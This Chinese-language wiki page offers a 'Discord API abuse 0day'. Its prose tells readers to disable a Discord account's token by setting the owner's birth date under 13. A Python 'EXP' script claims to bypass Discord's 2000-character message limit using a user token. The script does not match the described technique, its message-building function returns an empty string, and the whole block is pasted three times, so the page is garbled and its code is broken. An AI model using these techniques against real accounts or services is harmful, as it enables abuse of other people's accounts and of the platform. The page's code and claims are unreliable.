# Discord API濫用0day/zh-hans
{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Hand.png|50px]]
| 這個頁面需要補充,如果您了解該內容,請直接編輯詞條。
|}
|}
將賬戶的出生日期設置爲小於13歲以禁用Token,因爲Discord會自動禁用所有者小於13歲的賬戶。
==EXP:==
Usage:
py example.py
# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos
import requests
import random
import sys
class Exploit:
def __init__(self, token, channel):
self.token = token
self.channel_id = channel
self.headers = {'Authorization': token}
@property
def uri(self):
chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
return f''
def execute(self):
""" send magical URI """
return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})
def main():
if len(sys.argv) < 3:
print(f'Usage: py {sys.argv[0]} ')
sys.exit()
token = sys.argv[1]
channel_id = sys.argv[2]
exploit = Exploit(token, channel_id)
exploit.execute()
if __name__ == '__main__':
main()
原始作者未知。
{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Hand.png|50px]]
| 這個頁面需要補充,如果您了解該內容,請直接編輯詞條。
|}
|}
==漏洞原理:==
将账户的出生日期设置为小于13岁以禁用Token,因为Discord会自动禁用所有者小于13岁的账户。
请注意,已经设置DoB的账户不受到此漏洞影响。
==EXP:==
Usage:
py example.py
# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos
import requests
import random
import sys
class Exploit:
def __init__(self, token, channel):
self.token = token
self.channel_id = channel
self.headers = {'Authorization': token}
@property
def uri(self):
chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
return f''
def execute(self):
""" send magical URI """
return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})
def main():
if len(sys.argv) < 3:
print(f'Usage: py {sys.argv[0]} ')
sys.exit()
token = sys.argv[1]
channel_id = sys.argv[2]
exploit = Exploit(token, channel_id)
exploit.execute()
if __name__ == '__main__':
main()
==作者:==
原始作者未知。
{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Hand.png|50px]]
| 這個頁面需要補充,如果您了解該內容,請直接編輯詞條。
|}
|}
==漏洞原理:==
将账户的出生日期设置为小于13岁以禁用Token,因为Discord会自动禁用所有者小于13岁的账户。
请注意,已经设置DoB的账户不受到此漏洞影响。
==EXP:==
Usage:
python example.py
# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos
import requests
import random
import sys
class Exploit:
def __init__(self, token, channel):
self.token = token
self.channel_id = channel
self.headers = {'Authorization': token}
@property
def uri(self):
chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
return f''
def execute(self):
""" send magical URI """
return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})
def main():
if len(sys.argv) < 3:
print(f'Usage: py {sys.argv[0]} ')
sys.exit()
token = sys.argv[1]
channel_id = sys.argv[2]
exploit = Exploit(token, channel_id)
exploit.execute()
if __name__ == '__main__':
main()
==作者:==
原始作者未知。
请登录后查看评论内容